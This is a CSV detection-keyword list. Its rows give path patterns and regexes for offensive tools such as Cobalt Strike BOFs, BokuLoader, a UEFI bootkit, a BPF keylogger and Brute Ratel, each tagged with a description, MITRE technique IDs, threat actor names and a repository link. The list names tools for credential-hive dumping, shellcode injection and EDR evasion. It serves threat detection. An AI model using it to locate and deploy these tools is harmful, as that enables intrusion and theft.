"*/BOFNETExamples/*",".{0,1000}\/BOFNETExamples\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","5749"
"*/BOF-RegSave*",".{0,1000}\/BOF\-RegSave.{0,1000}","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","N/A","10","10","198","32","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z","5750"
"*/BofRunner.cs*",".{0,1000}\/BofRunner\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","5751"
"*/BOFs.git*",".{0,1000}\/BOFs\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","N/A","10","10","118","13","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z","5752"
"*/bof-vs-template/*",".{0,1000}\/bof\-vs\-template\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","5753"
"*/bof-vs-template/*",".{0,1000}\/bof\-vs\-template\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","5754"
"*/boko.py*",".{0,1000}\/boko\.py.{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/bashexplode/boko","1","1","N/A","N/A","N/A","1","71","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z","5755"
"*/boku7/spawn*",".{0,1000}\/boku7\/spawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/spawn","1","1","N/A","N/A","10","10","455","73","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z","5756"
"*/boku7/whereami/*",".{0,1000}\/boku7\/whereami\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/whereami","1","1","N/A","N/A","10","10","172","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z","5757"
"*/BokuLoader.c*",".{0,1000}\/BokuLoader\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","5758"
"*/BokuLoader.h*",".{0,1000}\/BokuLoader\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","5759"
"*/BokuLoader/*",".{0,1000}\/BokuLoader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","5760"
"*/BooExecutor.cs*",".{0,1000}\/BooExecutor\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","5765"
"*/bootkit-rs*",".{0,1000}\/bootkit\-rs.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","N/A","6","528","67","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z","5766"
"*/boxreflect.dll*",".{0,1000}\/boxreflect\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5771"
"*/bpf-keylogger.git*",".{0,1000}\/bpf\-keylogger\.git.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","1","N/A","N/A","10","1","4","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z","5772"
"*/bpf-keylogger/*",".{0,1000}\/bpf\-keylogger\/.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","1","N/A","N/A","10","1","4","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z","5773"
"*/bq1iFEP2/assert/dll/*",".{0,1000}\/bq1iFEP2\/assert\/dll\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","N/A","10","10","818","150","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z","5774"
"*/bq1iFEP2/assert/exe/*",".{0,1000}\/bq1iFEP2\/assert\/exe\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 